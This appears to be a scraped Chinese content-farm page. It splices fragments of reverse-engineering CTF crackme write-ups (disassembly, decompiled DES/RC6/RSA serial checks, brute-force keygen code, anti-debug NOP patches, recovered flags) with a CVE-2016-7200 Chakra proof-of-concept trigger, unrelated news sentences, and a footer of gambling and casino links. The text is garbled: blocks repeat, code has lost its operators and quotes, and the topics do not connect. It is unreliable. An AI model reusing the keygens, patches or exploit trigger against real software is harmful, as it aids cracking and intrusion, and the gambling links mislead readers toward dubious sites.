VSR2,:0000317CMOVSR0,::00003180MOVSR0,:00003182BLj_j_strlen_:00003186MOVSR1,:00003188MOVSR0,:0000318ABLcheck_snBYTEbuf[40];BYTEkey1[8];BYTEkey2[16];CopyMemory(buf,sn,36);FillMemory(buf+36,0x04,0x04);des_enc(buf,sizeof(buf),key1);(这里des_set_key在处理PC2_Table的时候与标准有偏差)CopyMemory(key2[12],buf[32],4);rc6_encrypt(buf,32,key2,sizeof(key2));(这个不常碰到,跟了一遍)memcmp(buf,expected,32)==0rc6与标准的区别:Q:0x9e3779b9L=0x61C88647L处理前和处理后都进行了byteswap32signedint__fastcallcheck_sn(constvoid*a1,size_ta2){...if(a2==36){v6=j_j_malloc(0x28u);v7=v6;if(v6){j_j_memcpy(v6,v3,v4);v7[36]=4;v7[37]=4;v7[38]=4;v7[39]=4;do{v8=g_key1[v2];v9=0;do{v17[8*v2+v9]=(v8(7-v9))1;++v9;}while(v9!=8);++v2;}while(v2!=8);des_set_key((int)v17);v10=0;do{v11=v7[v10];j_j_memcpy(dest,v7[v10],8u);v15=0;v16=0;des_1840((int)dest,(int)v15);v10+=8;j_j_memcpy(v11,v15,8u);}while(v10!=40);update_key2((int)g_key2,(int)v15);rc6_encrypt(v7,0x20u,(int)g_key2,16);v12=0;while((unsigned__int8)v7[v12]==byte_5D3D[v12]){if(++v12==32){result=1;gotoLABEL_14;}}}}result=0;...}3.穷举sn以kxuectf{开头,以}结尾这里直接按sn长度为36位来穷举了voidDes_SetKey(constcharKey[8]){staticboolK[64];staticboolKL[56];staticboolKR[56];ByteToBit(K,Key,64);Transform(K,K,PC1_Table,56);CopyMemory(KL[0],K[0],28);CopyMemory(KL[28],K[0],28);CopyMemory(KR[0],K[28],28);CopyMemory(KR[28],K[28],28);intoffset=0;for(inti=0;ii++){offset+=LOOP_Table[i];boolTmp[256];for(intn=0;nn++){if(PC2_Table[n]=28){Tmp[n]=KR[PC2_Table[n]-1-28+offset];}else{Tmp[n]=KL[PC2_Table[n]-1+offset];}}memcpy(SubKey[i],Tmp,48);}}voidtest_sn36(){constchar*charset=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789{}constchar*charset2=^_`mEJCTNKOGWRSFYVLZQAH[\\]upibejctnkogwrsfyvlzqahmdxKOGWRSFYVLuiconstchar*charset3=NOPQRSTUVWXYZABCDEFGHIJKLMnopqrstuvwxyzabcdefghijklm76543210}{intsn_len=36;intindices[36];charsn[40]=BYTEkey1[8]={0xFD,0xB4,0x68,0x54,0x08,0xCD,0x56,0x4E};BYTEkey2[16]={0x65,0x48,0x32,0xEF,0xBA,0xCD,0x56,0x4E,0x0F,0x9B,0x1D,0x27,0x00,0x00,0x00,0x00};CopyMemory(sn,kxuectf{,8);strings1=encode3((PBYTE)sn,8);for(intk1=0;k164;k1++){for(intk2=0;k264;k2++){for(intk3=0;k364;k3++){BYTEexpected[32]={0x42,0xD3,0xC3,0xC2,0xF1,0x2A,0xE9,0x2D,0x66,0xC9,0x28,0x22,0x2C,0xEB,0x54,0x0E,0x94,0x07,0xE5,0x77,0x4A,0x92,0xB7,0x92,0x2E,0x5D,0xFD,0xF0,0xF3,0x54,0x9F,0xC6};BYTEbuf1[8];buf1[0]=charset3[k1];buf1[1]=charset3[k2];buf1[2]=charset3[k3];buf1[3]=charset3[63];FillMemory(buf1+4,4,0x04);des_encrypt(buf1,8,key1);CopyMemory(key2[12],buf1,4);rc6_decrypt(expected,sizeof(expected),key2);des_decrypt(expected,sizeof(expected),key1);if(memcmp(expected,_str(),8)==0){CopyMemory(sn,expected,32);sn[32]=charset3[k1];sn[33]=charset3[k2];sn[34]=charset3[k3];sn[35]=charset3[63];sn[sn_len]=0;conver_charset(sn,sn_len,indices,charset,charset3);printf(%s,sn);}}}}}kxuectf{D3crypted1sV3rylntere5tin91}但这个样本有明显的特征:解析PE结构,所以当我们遇到这种样本的时候,可以考虑为反射式DLL注入。,借助SessionStack,可以将视频中的问题重放为视频,并查看用户发生的所有事情。有个这样的例子就是PTE转换,该PTE表示一个处于待命或修改状态的页。...【阅读全文】
v5r | 2018-1-16 | 阅读(697) | 评论(693)
尝试寻找原因:修改了smali但未能成功,似乎是底层限制;尝试切换最新版本(),可行。开幕式由副市长徐育东主持。,有3处"sizeof(BloomWord)"的使用应为"sizeof(BloomWord)*8",因为我们处理的是位,而不是字节。同时,如果在JS应用遇到了难以复制和理解问题,请查看SessionStack。...【阅读全文】
33b | 2018-1-16 | 阅读(263) | 评论(342)
会议大获成功,受到了梆梆安全、腾讯安全、爱加密、几维安全、百度安全、硬土壳、金山毒霸(猎豹旗下品牌)、乐变技术、腾讯TSRC、Wifi万能钥匙、天特信息、360公司、江民科技、博文视点、华章图书、infoQ、雷锋网等数十家公司和媒体的大力支持和赞助,会场爆满。往下走来到004015C5\8D4C241Cleaecx,dwordptr[esp+1C]/[\DeleteFileA004015D06A05push5004015D28BCDmovecx,ebp004015D4E8770C0000call00402250《-启动线程与驱动交互,dwordptr[esp+120]将004015D0-004015D4NOP掉,过掉线程检查在GetWindowTextA处下断,运行程序输入1111111111111,回车断下,查看调用栈来到_,dwordptr[esp+C][esp+24],,dwordptr[esp+C],dwordptr[esp+C],dwordptr[eax+4][ecx-8],6len(sn)==6004017C90F85F3000000jnz004018C2确定sn长度为6,继续往下分析,将sn反向,然后通过00401D50函数传到驱动进行处理,,dwordptr[esp+18],dwordptr[esp+1C]_,dwordptr[esp+14]对驱动传出来的数据进行md5,在线md5验证一下可确定获取md5后的字符串2-12,共10个字符的子串,dwordptr[esp+14]_,,结果与if(result=16){memcpy(v6,a1,result);v4=0;if(dword_114D8)++v6;if(v30){do{*(v6+v4)+=v4;++v4;}while(v4v3);}md5_init((int)v5);md5__2((int)v5,v6,strlen(v6));result=md5_final((unsignedint*)v5,a2);}首先,对输入值进行简单加法,然后进行md5运算,再然后将结果传回给exe。,(二)着力打造具有地域特色荷文化把发掘、传承、弘扬、光大荷文化底蕴作为示范区建设发展主线,不断推进荷文化建设,让传统荷文化保持旺盛的生命力。我知道,但那已经是10年前的事了。...【阅读全文】
jtp | 2018-1-15 | 阅读(909) | 评论(375)
下面程序进行穷举:importosdeflength(number):n=numberl=0whilen0:n=n/10l+=1returnldefisok(number):res=0n=numberwhilen0:res=res*10+n%10n=n/10ifres==number:return1return0deftest(a):b2=a*9i=0whilei2:b2*=ab2*=9if(isok(b2)==1):print(%d=%d%(a,b2))breaki+=1return0defskip(a):b=1n=awhilen0:if((n%10)==0):a+=bn=n/10b=b*10returnadefmain():printskip(10089000)i=11111111whilei=99999999:i=skip(i)test(i)i+=1printoverreturn0if__name__==__main__:main()输出结果为:需要反向输入,即sn=97654321CVE-2016-7200标签(空格分隔):ChakraPOCclassdummy{constructor(){return[1,2,3];}}classMyArrayextendsArray{staticget[](){returndummy;}}vara=newMyArray({},[],"natalie",7,7,7,7,7);functiontest(i){returntrue;}varo=(test);调试boolSparseArraySegmentT::IsMissingItem(constT*value){return*value==SparseArraySegmentT::GetMissingItem();}其中左值为0x0000000200000001,右值为0x8000000280000002value实际指向ArraySegment,其中length=3,size=6,元素为1、2、30x00000170823BC5100000000000000003........0x00000170823BC5180000000600000000........0x00000170823BC5200000000000000000........0x00000170823BC5280000000100000002........0x00000170823BC5300000000380000002.......\n0x00000170823BC5388000000280000002......\n对应于poc中定义的(test);会调用()filter()方法创建一个新数组,其包含通过所提供函数实现的测试的所有元素。,处理逻辑encode1是base64,encode2和encode3比较简单,略过sn=encode3(sn)+encode2(sn)+encode1(sn)publicclassMainextendsac{...protectedvoidonCreate(){();...//这个不懂为什么没生效,生效的是基类那个(newView$OnClickListener(){publicvoidonClick(Viewv){Stringv2=().toString().trim();if(((v2)+(v2)+(v2))==1){(,true);}else{(,false);}}});}}publicclassuvextendscc{...protectedvoidonCreate(BundlesavedInstanceState){(newView$OnClickListener(){publicvoidonClick(Viewv){Stringv2=().toString().trim();if(((v2)+(v2)+(v2))==1){(,true);}else{(,false);}}});}}publicclassua{static{(enjoy);}...publicstaticnativeintcheck(uathis,Stringarg1){}}处理逻辑JNI_OnLoad中有两个校验和反调试的地方,静态分析的时候直接nop掉,安装完后再替换掉就可以正常调试了(有检测dexsignature和TracerPid什么的).text:00001F4CBLcheck_:00001F50BLcheck_threadso中的check函数.text:00001F38MOVSR3,#:00001F3CLDRR5,[R2,R3].text:00001F3ELDRR2,=(off_5E54-0x1F48).text:00001F40MOVSR0,:00001F42MOVSR3,#:00001F44ADDR2,PCoff_::00005E54off_5E54JNINativeMethodbyte_5E60,aLjavaLangStrin,check+1len(sn)=120,原始sn长度范围(x+x+x/3*4=120):11~36从结果来看原始sn长度是36,但是我后面是从11开始穷举的,浪费了大量的时间.mytext:0000313ELDRR1,[R5].mytext:00003140MOVSR3,#:00003144LDRR3,[R1,R3].mytext:00003146MOVSR2,#:00003148MOVSR1,:0000314AMOVSR0,::0000314EMOVSR6,:00003150BLj_j_strlen_:00003154STRR4,[SP,#0x50+var_4C].mytext:00003156MOVSR1,#:00003158CMPR0,#:0000315ABGTloc_:0000315CADDR4,SP,#0x50+:0000315EMOVSR2,#:00003160MOVSR0,:00003162BLj_j_memset_:00003166MOVSR1,:00003168MOVSR2,#:0000316AMOVSR0,:0000316CBLj_j_memcpy_:00003170LDRR2,[R5].mytext:00003172MOVSR3,#:00003176LDRR3,[R2,R3].mytext:00003178MOVSR1,:0000317AMOVSR2,:0000317CMOVSR0,::00003180MOVSR0,:00003182BLj_j_strlen_:00003186MOVSR1,:00003188MOVSR0,:0000318ABLcheck_snBYTEbuf[40];BYTEkey1[8];BYTEkey2[16];CopyMemory(buf,sn,36);FillMemory(buf+36,0x04,0x04);des_enc(buf,sizeof(buf),key1);(这里des_set_key在处理PC2_Table的时候与标准有偏差)CopyMemory(key2[12],buf[32],4);rc6_encrypt(buf,32,key2,sizeof(key2));(这个不常碰到,跟了一遍)memcmp(buf,expected,32)==0rc6与标准的区别:Q:0x9e3779b9L=0x61C88647L处理前和处理后都进行了byteswap32signedint__fastcallcheck_sn(constvoid*a1,size_ta2){...if(a2==36){v6=j_j_malloc(0x28u);v7=v6;if(v6){j_j_memcpy(v6,v3,v4);v7[36]=4;v7[37]=4;v7[38]=4;v7[39]=4;do{v8=g_key1[v2];v9=0;do{v17[8*v2+v9]=(v8(7-v9))1;++v9;}while(v9!=8);++v2;}while(v2!=8);des_set_key((int)v17);v10=0;do{v11=v7[v10];j_j_memcpy(dest,v7[v10],8u);v15=0;v16=0;des_1840((int)dest,(int)v15);v10+=8;j_j_memcpy(v11,v15,8u);}while(v10!=40);update_key2((int)g_key2,(int)v15);rc6_encrypt(v7,0x20u,(int)g_key2,16);v12=0;while((unsigned__int8)v7[v12]==byte_5D3D[v12]){if(++v12==32){result=1;gotoLABEL_14;}}}}result=0;...}3.穷举sn以kxuectf{开头,以}结尾这里直接按sn长度为36位来穷举了voidDes_SetKey(constcharKey[8]){staticboolK[64];staticboolKL[56];staticboolKR[56];ByteToBit(K,Key,64);Transform(K,K,PC1_Table,56);CopyMemory(KL[0],K[0],28);CopyMemory(KL[28],K[0],28);CopyMemory(KR[0],K[28],28);CopyMemory(KR[28],K[28],28);intoffset=0;for(inti=0;ii++){offset+=LOOP_Table[i];boolTmp[256];for(intn=0;nn++){if(PC2_Table[n]=28){Tmp[n]=KR[PC2_Table[n]-1-28+offset];}else{Tmp[n]=KL[PC2_Table[n]-1+offset];}}memcpy(SubKey[i],Tmp,48);}}voidtest_sn36(){constchar*charset=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789{}constchar*charset2=^_`mEJCTNKOGWRSFYVLZQAH[\\]upibejctnkogwrsfyvlzqahmdxKOGWRSFYVLuiconstchar*charset3=NOPQRSTUVWXYZABCDEFGHIJKLMnopqrstuvwxyzabcdefghijklm76543210}{intsn_len=36;intindices[36];charsn[40]=BYTEkey1[8]={0xFD,0xB4,0x68,0x54,0x08,0xCD,0x56,0x4E};BYTEkey2[16]={0x65,0x48,0x32,0xEF,0xBA,0xCD,0x56,0x4E,0x0F,0x9B,0x1D,0x27,0x00,0x00,0x00,0x00};CopyMemory(sn,kxuectf{,8);strings1=encode3((PBYTE)sn,8);for(intk1=0;k164;k1++){for(intk2=0;k264;k2++){for(intk3=0;k364;k3++){BYTEexpected[32]={0x42,0xD3,0xC3,0xC2,0xF1,0x2A,0xE9,0x2D,0x66,0xC9,0x28,0x22,0x2C,0xEB,0x54,0x0E,0x94,0x07,0xE5,0x77,0x4A,0x92,0xB7,0x92,0x2E,0x5D,0xFD,0xF0,0xF3,0x54,0x9F,0xC6};BYTEbuf1[8];buf1[0]=charset3[k1];buf1[1]=charset3[k2];buf1[2]=charset3[k3];buf1[3]=charset3[63];FillMemory(buf1+4,4,0x04);des_encrypt(buf1,8,key1);CopyMemory(key2[12],buf1,4);rc6_decrypt(expected,sizeof(expected),key2);des_decrypt(expected,sizeof(expected),key1);if(memcmp(expected,_str(),8)==0){CopyMemory(sn,expected,32);sn[32]=charset3[k1];sn[33]=charset3[k2];sn[34]=charset3[k3];sn[35]=charset3[63];sn[sn_len]=0;conver_charset(sn,sn_len,indices,charset,charset3);printf(%s,sn);}}}}}kxuectf{D3crypted1sV3rylntere5tin91}前8个字符正好是des块长度,也就是说,我们知道了rc6的部分明文和密文,可以通过rc6解密穷举出rc6后4位key和全部rc6的明文。...【阅读全文】
n33 | 2018-1-15 | 阅读(769) | 评论(725)
秉承着技术与干货的原则,看雪学院于2017年11月成功举办了第一届安全开发者峰会,议题涵盖了安全编程、软件安全测试、智能设备安全、物联网安全、漏洞挖掘、移动安全、WEB安全、密码学、逆向技术、加密与解密、系统安全等,吸引了业内顶尖的开发者和技术专家,旨在推动软件开发安全的深入交流与分享,为安全人员、软件开发者、广大互联网人士及行业相关人士提供最具价值的交流平台。  在船上召开的座谈会上,李新元首先与大家共同学习党的十九大精神。,ida打开,定位到main函数后f5反编译mp_set_str(N,(__int64)6248BC3AB92A33B000FDB88568F19727F92F79EB68FF6AD73203EFD20A3E331BE941C7AA288095F33BC4B255FD983114D480EFFBEE2E313E6218A57F9CCC8189,0x10u);mp_set_str(D,(__int64)2476A7F02588913F228923E1F36F963F29708C07B117396817A6B94C336FC77FF7D381925EB40CFED8FBE894570155E41569B4EC69B26CB0320105A29651CB4B,0x10u);sub_140007AD0(T,0i64);mpz_mod((__int64)T,(__int64)N,(__int64)p);if(!(unsignedint)mpz_cmp_ui((__int64)T,0i64)){mpz_divexact(q,(__int64)N,(__int64)p);if((signedint)mpz_cmp((__int64)p,(__int64)q)=0){mpz_sub_ui(p,(__int64)p,1ui64);mpz_sub_ui(q,(__int64)q,1ui64);mpz_mul((__int64)T,(__int64)p,(__int64)q);mpz_invert(T,(__int64)e,(__int64)T);v10=mpz_cmp((__int64)D,(__int64)T);v11=注册成功!!!if(!v10)gotoLABEL_16;}}通过对比gmp大数库,重命名函数名。V8现在配备了并行Scavenger,通过大量基准测试我们发现它能够减少主线程垃圾收集总时间的20%-50%。...【阅读全文】
共5页

友情链接,当前时间:2018-7-18

赌场游戏 现金扎金花 博彩现金网 现金网游戏 老虎机怎么玩 澳门现金网
www.entwinetech.com www.bc9995.com 斗地主规则 老虎机 网页斗地主 澳门百家乐网
www.3553995.com www.new0003.com www.yh281.com www.8867hhh.com www.tyc740.com www.yh28777.com
现金网排名 www.6991315.com www.1aml.com www.404296.com www.v6790.com www.hg694.com